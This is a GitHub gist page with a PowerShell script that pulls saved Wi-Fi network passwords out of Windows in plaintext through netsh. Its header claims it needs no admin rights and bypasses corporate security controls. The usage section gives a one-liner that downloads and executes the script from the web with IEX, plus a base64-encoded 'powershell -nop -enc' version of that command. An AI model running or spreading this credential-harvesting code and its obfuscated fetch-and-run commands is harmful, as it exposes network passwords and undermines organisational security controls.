Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
.Synopsis
Simple script that extracts Wireless Network information and displays it in an easy-to-ready way
Does not require administrative rights
Bypasses standard Windows Corporate Security Controls (viewing plaintext credentials via the GUI)
.Usage
Local:
PS: C\> Import-Module Extract-WiFi-Creds.ps1
Show All credentials:
PS: C\> Extract-Wifi
Show Particular Network Details:
PS: C\> Extract-Wifi <SSID>
Download and Execute:
Plain:
PS: C\> IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/gfoss/c6a594d868d7a3efbc21b582aef32c3c/raw/4103fcc20fef5630e931d27445542bbb6bf44917/Extract-WiFi-Creds.ps1'); Extract-Wifi
Encoded:
PS: C\> powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBnAGYAbwBzAHMALwBjADYAYQA1ADkANABkADgANgA4AGQANwBhADMAZQBmAGIAYwAyADEAYgA1ADgAMgBhAGUAZgAzADIAYwAzAGMALwByAGEAdwAvADQAMQAwADMAZgBjAGMAMgAwAGYAZQBmADUANgAzADAAZQA5ADMAMQBkADIANwA0ADQANQA1ADQAMgBiAGIAYgA2AGIAZgA0ADQAOQAxADcALwBFAHgAdAByAGEAYwB0AC0AVwBpAEYAaQAtAEMAcgBlAGQAcwAuAHAAcwAxACcAKQA7ACAARQB4AHQAcgBhAGMAdAAtAFcAaQBmAGkA
#>
function Extract-Wifi {
[CmdLetBinding()]
param( [string]$network )
if ( $network ) {
Write-Host ""
Write-Host ""
Write-Host "Wireless Network Details:" -ForegroundColor Cyan
Write-Host "===================================" -ForegroundColor Gray
netsh.exe wlan show profiles name=$network key=clear
Write-Host "===================================" -ForegroundColor Gray
Write-Host ""
} else {
$networks = netsh.exe wlan show profiles key=clear | findstr "All"
$networkNames = @($networks.Split(":") | findstr -v "All").Trim()
Write-Host ""
Write-Host ""
Write-Host "Wireless Networks and Passwords" -ForegroundColor Cyan
Write-Host "===================================" -ForegroundColor Gray
Write-Host ""
Write-Host "SSID : Password"-ForegroundColor Gray
$result = New-Object -TypeName PSObject
foreach ( $ap in $networkNames ) {
try {
$password = netsh.exe wlan show profiles name=$ap key=clear | findstr "Key" | findstr -v "Index"
$passwordDetail = @($password.Split(":") | findstr -v "Key").Trim()
#if ( -Not $password ) {
# $password = netsh.exe wlan show profiles name=$ap key=clear | findstr "Auth"
# $passwordDetail = "$password"
#}
Write-Host "$ap" -NoNewline
Write-Host " : " -NoNewline
Write-Host "$passwordDetail" -ForegroundColor Green
} catch {
Write-Host "Unable to obtain password for $ap - Likely using 802.1x or Open Network" -ForegroundColor Red
}
}
Write-Host ""
Write-Host "===================================" -ForegroundColor Gray
Write-Host ""
}
Get-Variable | Remove-Variable -EA 0
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment